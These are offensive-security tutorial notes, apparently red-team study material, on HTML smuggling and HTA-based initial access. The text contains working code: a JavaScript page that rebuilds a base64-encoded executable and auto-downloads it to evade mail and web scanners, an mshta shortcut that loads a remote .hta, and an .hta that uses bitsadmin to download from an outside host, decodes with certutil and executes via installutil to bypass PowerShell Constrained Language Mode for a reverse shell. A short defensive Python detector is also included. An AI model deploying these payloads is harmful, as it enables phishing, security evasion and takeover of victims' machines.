HTML Smuggling & HTA Files

- HTML Smuggling

If you send a phishing email with a download link, the HTML may look something like:

<a href="http://attacker.com/file.doc">Download Me</a>

Email and web scanners are capable of parsing these links out and taking some action: the link may be removed entirely, or the URL content fetched and scanned by an AV sandbox. HTML smuggling gets around this by embedding the payload in the HTML source itself and using JavaScript so that the browser reconstructs the file and its download URL at runtime, leaving no external URL for the scanner to fetch.

First we create the encoded content:

echo -en "This is a smuggled file" | base64

or

cat malicious.exe | base64 -w 0; echo

Then the HTML code:

! Note that Google Chrome supports window.URL.createObjectURL, and the window.navigator.msSaveBlob method makes the technique work with legacy Microsoft Edge as well.

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>

        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }

        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';

        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>
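From the defender's side, the telltale combination in the page above is base64 reconstruction (atob / Uint8Array) plus a Blob plus a download sink (createObjectURL, msSaveBlob or a.download). The following is an added example, not part of the original page: a small Python scanner (names such as assess, find_indicators and extract_payloads are my own) that flags that combination in an HTML attachment and decodes any embedded base64 literal so the smuggled file can be hashed and handed to a scanner. The sample HTML is constructed here and mirrors the page's snippet.

```python
import re, base64, hashlib

# Constructed sample: a miniature of the smuggling page above (payload is plain text).
SAMPLE_HTML = """<html><body><p>This is all the user will see...</p>
<script>
function convertFromBase64(b){var s=window.atob(b);var o=new Uint8Array(s.length);
for(var i=0;i<s.length;i++){o[i]=s.charCodeAt(i);}return o.buffer;}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var blob = new Blob([convertFromBase64(file)], {type: 'octet/stream'});
var a = document.createElement('a'); a.href = window.URL.createObjectURL(blob);
a.download = 'test.txt'; a.click();
</script></body></html>"""

# Each indicator is one building block of the smuggling pattern.
INDICATORS = {
    "atob": r"\batob\s*\(",
    "uint8": r"new\s+Uint8Array\s*\(",
    "blob": r"\bnew\s+Blob\s*\(",
    "object_url": r"createObjectURL\s*\(",
    "ms_saveblob": r"msSaveOrOpenBlob|msSaveBlob",
    "download_attr": r"\.download\s*=",
}
# Quoted base64-looking literals of at least 16 characters.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

def find_indicators(html):
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, html))

def extract_payloads(html):
    """Decode quoted base64 literals so the hidden file can be hashed and scanned."""
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # not valid base64 after all (binascii.Error subclasses ValueError)
            continue
        found.append({"sha256": hashlib.sha256(data).hexdigest(),
                      "size": len(data), "magic": data[:4]})
    return found

def assess(html):
    hits = find_indicators(html)
    # Reconstruction + Blob + a download sink together are what a benign page rarely has.
    sink = any(h in hits for h in ("object_url", "ms_saveblob", "download_attr"))
    suspicious = "atob" in hits and "blob" in hits and sink
    return {"indicators": hits, "payloads": extract_payloads(html), "suspicious": suspicious}

if __name__ == "__main__":
    print(assess(SAMPLE_HTML))
```

The decoded payload's magic bytes and hash can be fed to the same AV/sandbox pipeline that would otherwise have scanned the fetched URL.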

- HTA Files

HTA-based attacks offer simplicity in development and obfuscation, with flexibility for evasion. They bypass SmartScreen but face challenges such as heightened detection efforts, reliance on user interaction, and the detectability of mshta.exe as the parent process.

An .hta file that performs a simple ping:

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 2 192.168.X.Y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

This is useful because we can create a shortcut file that is executed by a built-in Windows application. To create the shortcut file, we’ll right-click the desktop on the Windows machine and navigate to New -> Shortcut. In the new window, we’ll enter the MSHTA executable path (C:\Windows\System32\mshta.exe) followed by the URL of the .hta file on our Kali machine. Example: C:\Windows\System32\mshta.exe http://192.168.119.120/test.hta

Then we transfer this shortcut to our Kali machine. From there we can create JScript code generated with DotNetToJscript, embed it in the .hta file and obtain a reverse shell by only sending the victim this shortcut file.

We can also combine this shortcut with HTML Smuggling.

If we want, for example, an .hta file that bypasses PowerShell CLM (Constrained Language Mode) and loads a PowerShell reverse shell, we can use the following code (the binary should first be certutil-encoded and must follow the structure of the InstallUtil C# code to bypass PCLM):

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden bitsadmin /Transfer newjob3 http://192.168.49.173/enc3.txt c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\bypass.exe;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\windows\\temp\\bypass.exe")
//var res = shell.Run("bitsadmin /Transfer newjob2 http://192.168.49.173/enc2.txt c:\\windows\\temp\\enc1.txt");
//var res1 = shell.Run("timeout 10 && certutil -decode c:\\windows\\temp\\enc.txt c:\\windows\\temp\\bypass.exe");
//var res2 = shell.Run("timeout 12 && C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\windows\\temp\\bypass.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
